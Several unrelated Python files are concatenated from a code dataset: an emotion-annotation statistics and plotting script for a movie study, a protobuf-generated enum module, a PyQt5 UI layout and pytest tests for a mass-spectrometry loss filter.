c = spearmanr(v1, v2)[0]
# fisher transform
fc = np.arctanh(c)
se = 1. / np.sqrt(len(v1) - 3)
# back to correlation
ci = np.tanh(fc + 1.96 * se)
if np.isnan(c):
return 'n/a'
else:
if c >= 0.5:
return '\\textbf{%.3f} $\\pm$%.3f' % (c, ci - c)
else:
return '%.3f $\\pm$%.3f' % (c, ci - c)
def print_stats(rat, rat_label, all_rat):
# compute various annotation statistics
print '\\newcommand{\\%sTotalRaters}{%i}' % (rat_label, len(rat))
athresh = 0.5
print '\\newcommand{\\%sAggThresh}{%i\\%%}' % (rat_label, athresh * 100)
segments = get_nsecond_segments()
print '\\newcommand{\\%sFracWithLabeledChar}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'character') * 100)
e = get_agreed_labels(rat, 'character', segments, athresh=-1)
print '%% %s total character labels' % (rat_label,)
print '%% %s' % [v[0] for v in e]
print '\\newcommand{\\%sTotalCharLabels}{%i}' % (rat_label, len(e))
e = get_agreed_labels(rat, 'character', segments, athresh=athresh, nseg_thresh=5)
print '%% %s character labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshCharLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledEmotions}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'emotion') * 100)
e = get_agreed_labels(rat, 'emotion', segments, athresh=athresh)
print '%% %s emotion labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshEmoLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledOncue}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'oncue') * 100)
e = get_agreed_labels(rat, 'oncue', segments, athresh=athresh)
print '%% %s oncue labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshOncueLabels}{%i}' % (rat_label, len(e))
print '\\newcommand{\\%sFracWithLabeledOffcue}{%.1f\\%%}' \
% (rat_label, get_labeled_fraction(rat, 'offcue') * 100)
e = get_agreed_labels(rat, 'offcue', segments, athresh=athresh)
print '%% %s offcue labels AGG > %.2f' % (rat_label, athresh)
print '%% %s' % e
print '\\newcommand{\\%sThreshOffcueLabels}{%i}' % (rat_label, len(e))
# per character stats
for char, clabel in (('*', 'AllChar'),
('FORREST', 'Forrest'),
('JENNY', 'Jenny')):
print '\\newcommand{\\%sCorrArousalValence%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_arousal_modulation(rat, segments, char=char),
get_valence_modulation(rat, segments, char=char)))
print '\\newcommand{\\%sCorrValenceDirection%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_valence_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)))
print '\\newcommand{\\%sCorrArousalDirection%s}{%s}' \
% (rat_label, clabel,
get_corr_ci(get_arousal_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)))
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'arousal': 'HIGH', 'character': char},
{'arousal': 'LOW', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistArousal%s}{%s}' \
% (rat_label, clabel, s)
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'valence': 'POS', 'character': char},
{'valence': 'NEG', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistValence%s}{%s}' \
% (rat_label, clabel, s)
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'direction': 'SELF', 'character': char},
{'direction': 'OTHER', 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsistDirection%s}{%s}' \
% (rat_label, clabel, s)
for emo in get_unique_emotions(all_rat):
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'emotion': emo, 'character': char},
{'emotion': None, 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsist%s%s}{%s}' \
% (rat_label, emo, clabel, s)
for cue in get_unique_oncues(all_rat):
s = get_ci_stats(
calc_bootstrapped_intercorrelation(
rat, {'oncue': cue, 'character': char},
{'oncue': None, 'character': char},
segments))
print '\\newcommand{\\%sInterRaterConsist%s%s}{%s}' \
% (rat_label, cue, clabel, s)
#
# Plots
#
def comp_barplot(av, ao, col, ylabel):
# helper for all bar plots
import pylab as pl
from mvpa2.misc.plot import plot_bars
avd = {e[0]: e[col] for e in av}
aod = {e[0]: e[col] for e in ao}
joind = {k: 0 for k in avd.keys() + aod.keys()}
for k, v in avd.iteritems():
joind[k] = v
p = plot_bars([joind[k] for k in sorted(joind.keys())], yerr=None,
offset=-.15, width=.3)
p.set_label("audio-visual")
joind = {k: 0 for k in avd.keys() + aod.keys()}
for k, v in aod.iteritems():
joind[k] = v
p = plot_bars([joind[k] for k in sorted(joind.keys())], yerr=None,
color='0.2', offset=.15, width=.3,
labels=[bn(n) for n in sorted(joind.keys())])
p.set_label("audio-only")
pl.xlim((-1, len(joind)))
pl.ylabel(ylabel)
pl.legend()
def bipolar_tsplot(av, ao, col, colx_labels, ylabels, segments, char='*'):
# helper for all time series plot for bipolar variables
ts = slice2segments(ao, {col: colx_labels[0], 'character': char}, segments) \
- slice2segments(ao, {col: colx_labels[1], 'character': char}, segments)
pl.plot(segments.T[0], ts, label='audio-only', color='blue', alpha=.5)
pl.fill_between(segments.T[0], ts, color='blue', alpha=.5)
ts = slice2segments(av, {col: colx_labels[0], 'character': char}, segments) \
- slice2segments(av, {col: colx_labels[1], 'character': char}, segments)
pl.plot(segments.T[0], ts, label='audio-visual', color='green', alpha=.5)
pl.fill_between(segments.T[0], ts, color='green', alpha=.5)
pl.ylabel('%s' % (bn(col)))
pl.xlabel('movie time in seconds')
pl.xlim((segments[0, 0], segments[-1, 1]))
pl.yticks(np.array((-1, 0, 1)), ylabels)
pl.ylim((-1, 1))
pl.legend()
def unipolar_tsplot(av, ao, col, colx_label, segments, char='*'):
# helper for all time series plot for unipolar variables
pl.fill_between(
segments.T[0], slice2segments(ao, {col: colx_label, 'character': char}, segments),
label='audio-only', zorder=0, color='blue', alpha=.5)
pl.fill_between(
segments.T[0], slice2segments(av, {col: colx_label, 'character': char}, segments),
label='audio-visual', zorder=1, color='green', alpha=.5)
pl.ylabel('%s' % (bn(colx_label)))
pl.xlabel('movie time in seconds')
pl.xlim((segments[0, 0], segments[-1, 1]))
pl.ylim((0, 1))
pl.yticks(np.array((0, 1)), ('absent (0)', 'present (1)'))
def mkplot_indicator_ts(avr, aor, character, segments, figpath):
# demo plot with time series of various properties across the movie
fig = pl.figure(figsize=(10, 8), dpi=300)
_ = pl.subplot(811)
bipolar_tsplot(avr, aor,
'arousal', ('HIGH', 'LOW'),
('low (-1)', 'neutral (0)', 'high (+1)'),
segments,
char=character)
_ = pl.subplot(812)
bipolar_tsplot(avr, aor,
'valence', ('POS', 'NEG'),
('neg (-1)', 'neutral (0)', 'pos (+1)'),
segments,
char=character)
_ = pl.subplot(813)
unipolar_tsplot(avr, aor, 'emotion', 'HAPPINESS', segments, char=character)
_ = pl.subplot(814)
unipolar_tsplot(avr, aor, 'emotion', 'LOVE', segments, char=character)
_ = pl.subplot(815)
unipolar_tsplot(avr, aor, 'emotion', 'FEAR', segments, char=character)
_ = pl.subplot(816)
unipolar_tsplot(avr, aor, 'emotion', 'SADNESS', segments, char=character)
_ = pl.subplot(817)
unipolar_tsplot(avr, aor, 'emotion', 'ANGERRAGE', segments, char=character)
_ = pl.subplot(818)
unipolar_tsplot(avr, aor, 'oncue', 'VERBAL', segments, char=character)
fig.autofmt_xdate()
if character == '*':
character = 'allchar'
pl.savefig(opj(figpath, 'indicator_ts_%s.svg' % character.lower()))
def print_combstats(avr, aor):
# various stats computed across stimulus types
segments = get_nsecond_segments()
for char, clabel in (('*', 'AllChar'),
('FORREST', 'Forrest'),
('JENNY', 'Jenny')):
print '\\newcommand{\\InterModCorrArousal%s}{%s}' \
% (clabel,
get_corr_ci(get_arousal_modulation(avr, segments, char=char),
get_arousal_modulation(aor, segments, char=char)))
print '\\newcommand{\\InterModCorrValence%s}{%s}' \
% (clabel,
get_corr_ci(get_valence_modulation(avr, segments, char=char),
get_valence_modulation(aor, segments, char=char)))
print '\\newcommand{\\InterModCorrDirection%s}{%s}' \
% (clabel,
get_corr_ci(get_direction_modulation(avr, segments, char=char),
get_direction_modulation(aor, segments, char=char)))
for emo in get_unique_emotions(avr + aor):
print '\\newcommand{\\InterModCorr%s%s}{%s}' \
% (emo, clabel,
get_corr_ci(_get_modulation(avr, segments, emotion=emo, character=char),
_get_modulation(aor, segments, emotion=emo, character=char)))
for cue in get_unique_oncues(avr + aor):
print '\\newcommand{\\InterModCorr%s%s}{%s}' \
% (cue, clabel,
get_corr_ci(_get_modulation(avr, segments, oncue=cue, character=char),
_get_modulation(aor, segments, oncue=cue, character=char)))
#
# Segmentation
#
def mk_thresh_emotion_episodes(rat, thresh, segments):
# yield per character list of emotion episodes with a minimum inter-observer
# agreement wrt any emotion attribute
chars = get_unique_characters(rat)
episodes = {}
def _postprocess(e):
return {k: np.median(v) for k, v in e.iteritems()}
for char in chars:
ep = episodes.get(char, [])
ind = [get_arousal_modulation(rat, segments, char=char)]
labels = ['arousal']
for l, d in (('v_pos', dict(valence='POS')),
('v_neg', dict(valence='NEG')),
('d_self', dict(direction='SELF')),
('d_other', dict(direction='OTHER')),
('e_admiration', dict(emotion='ADMIRATION')),
('e_anger/rage', dict(emotion='ANGER/RAGE')),
('e_contempt', dict(emotion='CONTEMPT')),
('e_disappointment', dict(emotion='DISAPPOINTMENT')),
('e_fear', dict(emotion='FEAR')),
('e_fears_confirmed', dict(emotion='FEARS_CONFIRMED')),
('e_gloating', dict(emotion='GLOATING')),
('e_gratification', dict(emotion='GRATIFICATION')),
('e_gratitude', dict(emotion='GRATITUDE')),
('e_happiness', dict(emotion='HAPPINESS')),
('e_happy-for', dict(emotion='HAPPY-FOR')),
('e_hate', dict(emotion='HATE')),
('e_hope', dict(emotion='HOPE')),
('e_love', dict(emotion='LOVE')),
('e_pity/compassion', dict(emotion='PITY/COMPASSION')),
('e_pride', dict(emotion='PRIDE')),
('e_relief', dict(emotion='RELIEF')),
('e_remorse', dict(emotion='REMORSE')),
('e_resent', dict(emotion='RESENTMENT')),
('e_sadness', dict(emotion='SADNESS')),
('e_satisfaction', dict(emotion='SATISFACTION')),
('e_shame', dict(emotion='SHAME')),
('c_audio', dict(oncue='AUDIO')),
('c_context', dict(oncue='CONTEXT')),
('c_face', dict(oncue='FACE')),
('c_gesture', dict(oncue='GESTURE')),
('c_narrator', dict(oncue='NARRATOR')),
('c_verbal', dict(oncue='VERBAL')),
):
ind.append(_get_modulation(rat, segments, character=char, **d))
labels.append(l)
ind = np.array(ind)
# where is any above threshold agreement
flags = np.abs(ind) >= thresh
staging = None
last_ind = np.array([False] * len(ind))
# for each segment
for i, f in enumerate(flags.T):
# print i, f,
if not np.sum(f):
if staging:
ep.append(_postprocess(staging))
staging = None
# print 'commit',
last_ind = f
# print 'skip'
continue
# continuing episode?
if np.all(f == last_ind):
# end of annotation is end of current segment
staging['end'] = segments[i, 1]
for nl, l in enumerate(labels):
staging[l].append(ind[nl, i])
# print 'extend'
else:
# new episode
if staging:
# print 'commit',
ep.append(_postprocess(staging))
# print 'new'
staging = dict(start=segments[i, 0],
end=segments[i, 1])
last_ind = f
for nl, l in enumerate(labels):
staging[l] = [ind[nl, i]]
episodes[char] = ep
return episodes, labels
def emo2advene(data, labels, thresh=0.5):
# format output of `mk_thresh_emotion_episodes()` into a format that is
# importable by Advene, while merging all episodes of all characters
# into a single file
episodes = []
s = ''
for char, ep in data.iteritems():
for e in ep:
e['character'] = char
episodes.append(e)
episodes = sorted(episodes, cmp=lambda x, y: cmp(x['start'], y['start']))
for e in episodes:
tags = []
if e['arousal'] > thresh:
tags.append('ha')
elif e['arousal'] < (-1 * thresh):
tags.append('la')
for l in labels:
if l == 'arousal':
continue
if e[l] > thresh:
tags.append(l[2:])
e['tags'] = ','.join(tags)
s += "%(start).1f\t%(end).1f\tchar=%(character)s tags=%(tags)s arousal=%(arousal).2f val_pos=%(v_pos).2f val_neg=%(v_neg).2f\n" % e
return s
#
# Helpers
#
def bn(n):
# beautify names
n = n.lower()
if n == 'forrestvo':
return 'Forrest (VO)'
elif n == 'mrsgump':
return 'Mrs. Gump'
elif n == 'disappointment':
return 'Disappoint.'
elif n == 'angerrage':
return 'Anger/Rage'
return n.capitalize()
def get_unique_characters(rat):
return np.unique(
np.concatenate(
[np.unique([a['character'] for a in an])
for an in rat]))
def get_unique_emotions(rat):
return [e for e in np.unique(
np.concatenate(
[np.unique(
np.concatenate([a['emotion'].split() for a in an]))
for an in rat])) if not '?' in e]
def get_unique_oncues(rat):
return [e for e in np.unique(
np.concatenate(
[np.unique(
np.concatenate([a['oncue'].split() for a in an]))
for an in rat])) if not '?' in e]
def slice2segments(ratings, cond, segments):
# compute a time series of inter-observer agreement wrt a particular
# emotion property (or combinations thereof)
# annotations given with start and stop time, are converted into a
# timeseries with data point locations given by the sequence of
# `segments`. Segments intersecting with a given annotation from an
# individual observer are set to one, the rest to zero. The mean
# across observers for any segment is returned
slicer = np.zeros(len(segments))
for rat in ratings:
rslicer = np.zeros(len(segments))
for e in rat:
use = True
for k, v in cond.iteritems():
if v == '*':
continue
if k in ('oncue', 'offcue', 'emotion'):
if not v in e[k].split():
use = False
else:
if not v == e[k]:
use = False
if not use:
continue
select = np.logical_and(segments.T[1] > e['start'],
segments.T[0] < e['end'])
rslicer[select] += 1
slicer += rslicer > 0
slicer = slicer.astype(float) / len(ratings)
return slicer
def get_labeled_ratings(rat, col):
return [r[r[col] != ''] for r in rat]
def get_timeseries(rat, urat, segments, char='*'):
# yield time series representations of all relevant emotion attributes
# from raw annotations
vars = [get_arousal_modulation(rat, segments, char=char),
get_valence_modulation(rat, segments, char=char),
get_direction_modulation(rat, segments, char=char)]
labels = ['arousal', 'valence', 'direction']
for emo in get_unique_emotions(urat):
vars.append(_get_modulation(rat, segments, emotion=emo, character=char))
labels.append(emo.lower())
for oc in get_unique_oncues(urat):
vars.append(_get_modulation(rat, segments, oncue=oc, character=char))
labels.append(oc.lower())
return np.array(vars).T, labels
def _get_modulation(ratings, segments, **kwargs):
return slice2segments(ratings, kwargs, segments)
def get_arousal_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, arousal='HIGH') \
- _get_modulation(ratings, segments, character=char, arousal='LOW')
return ts
def get_valence_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, valence='POS') \
- _get_modulation(ratings, segments, character=char, valence='NEG')
return ts
def get_direction_modulation(ratings, segments, char='*'):
ts = _get_modulation(ratings, segments, character=char, direction='SELF') \
- _get_modulation(ratings, segments, character=char, direction='OTHER')
return ts
if __name__ == '__main__':
# main function: compute stats, generate derived data, make figures
import sys
import pylab as pl
import os
from os.path import join as opj
if len(sys.argv) < 3:
print "insufficient number of arguments"
print "usage: descr_stats.py <stats export path> <figure export path>"
sys.exit(1)
statspath = sys.argv[1]
figpath = sys.argv[2]
for p in (opj(statspath, 'timeseries'),
opj(statspath, 'segmentation')):
if not os.path.exists(p):
os.makedirs(p)
second_segments = get_nsecond_segments()
avr = get_av_ratings()
aor = get_ao_ratings()
open(opj(statspath, 'segmentation', 'emotions_av_1s_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(avr, .5, get_nsecond_segments(1)),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_ao_1s_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(aor, .5, get_nsecond_segments(1)),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_av_shots_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(avr, .5, get_shots()),
thresh=.5))
open(opj(statspath, 'segmentation', 'emotions_ao_shots_thr50.tsv'), 'w').write(
emo2advene(
*mk_thresh_emotion_episodes(aor, .5, get_shots()),
thresh=.5))
# export inter-observer agreement timeseries
# for stim type
for rat, ratlabel in ((avr, 'av'), (aor, 'ao')):
# for segment type
for seg, seglabel in ((get_nsecond_segments(1), '1s'),
(get_nsecond_segments(2), '2s'),
(get_shots(), 'shots')):
# for all characters
for char in ('*',) + tuple(get_unique_characters(rat)):
arr, l = get_timeseries(rat, rat, seg, char=char)
if char == '*':
char = 'allchar'
np.savetxt(
opj(statspath, 'timeseries',
'ioats_%s_%s_%s.csv' % (seglabel, ratlabel, char.lower())),
arr, fmt='%.2f', delimiter=',', comments='',
header=','.join(l))
# export summary stats for the data paper
print_stats(avr, 'AV', avr + aor)
print_stats(aor, 'AO', avr + aor)
print_combstats(avr, aor)
# IOA time series demo plot
mkplot_indicator_ts(avr, aor, '*', get_nsecond_segments(n=10), figpath)
# episodes per character plot
fig = pl.figure(figsize=(10, 6))
pl.subplot(121)
comp_barplot(
get_agreed_labels(avr, 'character', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'character', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
ax = pl.subplot(122)
comp_barplot(
get_agreed_labels(avr, 'character', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'character', second_segments, athresh=.5, nseg_thresh=5),
1,
'Total time of portrayed emotions (in sec)')
ax.yaxis.tick_right()
ax.yaxis.set_label_position("right")
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'character_episodes.svg'))
# episodes per emotion catgeory plot
fig = pl.figure(figsize=(10, 6))
pl.subplot(121)
comp_barplot(
get_agreed_labels(avr, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
ax = pl.subplot(122)
comp_barplot(
get_agreed_labels(avr, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'emotion', second_segments, athresh=.5, nseg_thresh=5),
1,
'Total number of emotion episodes')
ax.yaxis.tick_right()
ax.yaxis.set_label_position("right")
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'labeledemotion_episodes.svg'))
# episodes per onset cue type plot
fig = pl.figure(figsize=(5, 5))
comp_barplot(
get_agreed_labels(avr, 'oncue', second_segments, athresh=.5, nseg_thresh=5),
get_agreed_labels(aor, 'oncue', second_segments, athresh=.5, nseg_thresh=5),
2,
'Total number of emotion episodes')
fig.autofmt_xdate()
pl.savefig(opj(figpath, 'labeledoncue_episodes.svg'))
# intra-stimulus IOA time series correlation plot
import seaborn as sns
fig = pl.figure()
cmap_range = (-.6, .6)
pl.subplot(121)
m, l = get_timeseries(avr, avr + aor, second_segments)
l = [bn(i) for i in l]
sns.corrplot(
m, annot=False, method='spearman', names=l, diag_names=False, cmap_range=cmap_range)
pl.subplot(122)
m, l = get_timeseries(aor, avr + aor, second_segments)
l = [bn(i) for i in l]
sns.corrplot(
m, annot=False, method='spearman', names=l, diag_names=False, cmap_range=cmap_range)
# fig.autofmt_xdate()
pl.savefig(opj(figpath, 'intercorr_indicators.svg'))
# pl.show()
| StarcoderdataPython |
1788666 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: control_delegation.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='control_delegation.proto',
package='protocol',
syntax='proto2',
serialized_pb=_b('\n\x18\x63ontrol_delegation.proto\x12\x08protocol*<\n\x1bprp_control_delegation_type\x12\x1d\n\x19PRCDT_MAC_DL_UE_SCHEDULER\x10\x01')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PRP_CONTROL_DELEGATION_TYPE = _descriptor.EnumDescriptor(
name='prp_control_delegation_type',
full_name='protocol.prp_control_delegation_type',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PRCDT_MAC_DL_UE_SCHEDULER', index=0, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=38,
serialized_end=98,
)
_sym_db.RegisterEnumDescriptor(_PRP_CONTROL_DELEGATION_TYPE)
prp_control_delegation_type = enum_type_wrapper.EnumTypeWrapper(_PRP_CONTROL_DELEGATION_TYPE)
PRCDT_MAC_DL_UE_SCHEDULER = 1
DESCRIPTOR.enum_types_by_name['prp_control_delegation_type'] = _PRP_CONTROL_DELEGATION_TYPE
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
1632418 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ComplexUI.ui'
#
# Created by: PyQt5 UI code generator 5.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(801, 600)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 801, 551))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tabWidget_2 = QtWidgets.QTabWidget(self.tab)
self.tabWidget_2.setGeometry(QtCore.QRect(0, 0, 791, 531))
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.treeWidget = QtWidgets.QTreeWidget(self.tab_3)
self.treeWidget.setGeometry(QtCore.QRect(0, 0, 781, 501))
self.treeWidget.setObjectName("treeWidget")
item_0 = QtWidgets.QTreeWidgetItem(self.treeWidget)
item_0 = QtWidgets.QTreeWidgetItem(self.treeWidget)
item_1 = QtWidgets.QTreeWidgetItem(item_0)
self.tabWidget_2.addTab(self.tab_3, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.verticalLayoutWidget = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 791, 501))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.calendarWidget = QtWidgets.QCalendarWidget(self.verticalLayoutWidget)
self.calendarWidget.setObjectName("calendarWidget")
self.verticalLayout.addWidget(self.calendarWidget)
self.dateEdit = QtWidgets.QDateEdit(self.verticalLayoutWidget)
self.dateEdit.setObjectName("dateEdit")
self.verticalLayout.addWidget(self.dateEdit)
self.tabWidget_2.addTab(self.tab_4, "")
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.groupBox = QtWidgets.QGroupBox(self.tab_2)
self.groupBox.setGeometry(QtCore.QRect(10, 20, 331, 131))
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(90, 30, 55, 62))
self.widget.setObjectName("widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.radioButton = QtWidgets.QRadioButton(self.widget)
self.radioButton.setObjectName("radioButton")
self.verticalLayout_2.addWidget(self.radioButton)
self.radioButton_2 = QtWidgets.QRadioButton(self.widget)
self.radioButton_2.setObjectName("radioButton_2")
self.verticalLayout_2.addWidget(self.radioButton_2)
self.radioButton_3 = QtWidgets.QRadioButton(self.widget)
self.radioButton_3.setObjectName("radioButton_3")
self.verticalLayout_2.addWidget(self.radioButton_3)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setGeometry(QtCore.QRect(350, 20, 431, 131))
self.groupBox_2.setObjectName("groupBox_2")
self.widget1 = QtWidgets.QWidget(self.groupBox_2)
self.widget1.setGeometry(QtCore.QRect(80, 20, 311, 102))
self.widget1.setObjectName("widget1")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget1)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.dial = QtWidgets.QDial(self.widget1)
self.dial.setObjectName("dial")
self.horizontalLayout.addWidget(self.dial)
self.lcdNumber = QtWidgets.QLCDNumber(self.widget1)
self.lcdNumber.setObjectName("lcdNumber")
self.horizontalLayout.addWidget(self.lcdNumber)
self.fontComboBox = QtWidgets.QFontComboBox(self.tab_2)
self.fontComboBox.setGeometry(QtCore.QRect(10, 190, 331, 22))
self.fontComboBox.setObjectName("fontComboBox")
self.label = QtWidgets.QLabel(self.tab_2)
self.label.setGeometry(QtCore.QRect(10, 220, 331, 211))
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.progressBar = QtWidgets.QProgressBar(self.tab_2)
self.progressBar.setGeometry(QtCore.QRect(10, 470, 781, 23))
self.progressBar.setProperty("value", 24)
self.progressBar.setObjectName("progressBar")
self.tabWidget.addTab(self.tab_2, "")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 801, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.tabWidget_2.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "ComplexUI"))
self.treeWidget.headerItem().setText(0, _translate("MainWindow", "第1列"))
self.treeWidget.headerItem().setText(1, _translate("MainWindow", "New Column"))
__sortingEnabled = self.treeWidget.isSortingEnabled()
self.treeWidget.setSortingEnabled(False)
self.treeWidget.topLevelItem(0).setText(0, _translate("MainWindow", "子项目1"))
self.treeWidget.topLevelItem(1).setText(0, _translate("MainWindow", "子项目2"))
self.treeWidget.topLevelItem(1).child(0).setText(0, _translate("MainWindow", "子子项目1"))
self.treeWidget.setSortingEnabled(__sortingEnabled)
self.tabWidget_2.setTabText(self.tabWidget_2.indexOf(self.tab_3), _translate("MainWindow", "树"))
self.tabWidget_2.setTabText(self.tabWidget_2.indexOf(self.tab_4), _translate("MainWindow", "日历"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "选项卡1"))
self.groupBox.setTitle(_translate("MainWindow", "功能选择"))
self.radioButton.setText(_translate("MainWindow", "默认"))
self.radioButton_2.setText(_translate("MainWindow", "重置"))
self.radioButton_3.setText(_translate("MainWindow", "选项3"))
self.groupBox_2.setTitle(_translate("MainWindow", "移动刻度盘"))
self.label.setText(_translate("MainWindow", "TextLabel"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "选项卡2"))
| StarcoderdataPython |
174454 | import numpy
import pytest
from testfixtures import LogCapture
from matchms.filtering import add_losses
from .builder_Spectrum import SpectrumBuilder
@pytest.mark.parametrize("mz, loss_mz_to, expected_mz, expected_intensities", [
[numpy.array([100, 150, 200, 300], dtype="float"), 1000, numpy.array([145, 245, 295, 345], "float"), numpy.array([1000, 100, 200, 700], "float")],
[numpy.array([100, 150, 200, 450], dtype="float"), 1000, numpy.array([245, 295, 345], "float"), numpy.array([100, 200, 700], "float")],
[numpy.array([100, 150, 200, 300], dtype="float"), 250, numpy.array([145, 245], "float"), numpy.array([1000, 100], "float")]
])
def test_add_losses_parameterized(mz, loss_mz_to, expected_mz, expected_intensities):
intensities = numpy.array([700, 200, 100, 1000], "float")
metadata = {"precursor_mz": 445.0}
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(
intensities).with_metadata(metadata).build()
spectrum = add_losses(spectrum_in, loss_mz_to=loss_mz_to)
assert numpy.allclose(spectrum.losses.mz, expected_mz), "Expected different loss m/z."
assert numpy.allclose(spectrum.losses.intensities, expected_intensities), "Expected different intensities."
@pytest.mark.parametrize("mz, intensities", [
[numpy.array([100, 150, 200, 300], dtype="float"), numpy.array([700, 200, 100, 1000], dtype="float")],
[[], []]
])
def test_add_losses_without_precursor_mz_parameterized(mz, intensities):
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(intensities).build()
spectrum = add_losses(spectrum_in)
with LogCapture() as log:
spectrum = add_losses(spectrum_in)
assert spectrum == spectrum_in and spectrum is not spectrum_in
log.check(
("matchms", "WARNING",
"No precursor_mz found. Consider applying 'add_precursor_mz' filter first.")
)
def test_add_losses_with_precursor_mz_wrong_type():
"""Test if correct assert error is raised for precursor-mz as string."""
mz = numpy.array([100, 150, 200, 300], dtype="float")
intensities = numpy.array([700, 200, 100, 1000], "float")
metadata = {"precursor_mz": "445.0"}
spectrum_in = SpectrumBuilder().with_mz(mz).with_intensities(
intensities).with_metadata(metadata).build()
with pytest.raises(AssertionError) as msg:
_ = add_losses(spectrum_in)
assert "Expected 'precursor_mz' to be a scalar number." in str(msg.value)
def test_add_losses_with_input_none():
"""Test if input spectrum is None."""
spectrum_in = None
spectrum = add_losses(spectrum_in)
assert spectrum is None
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.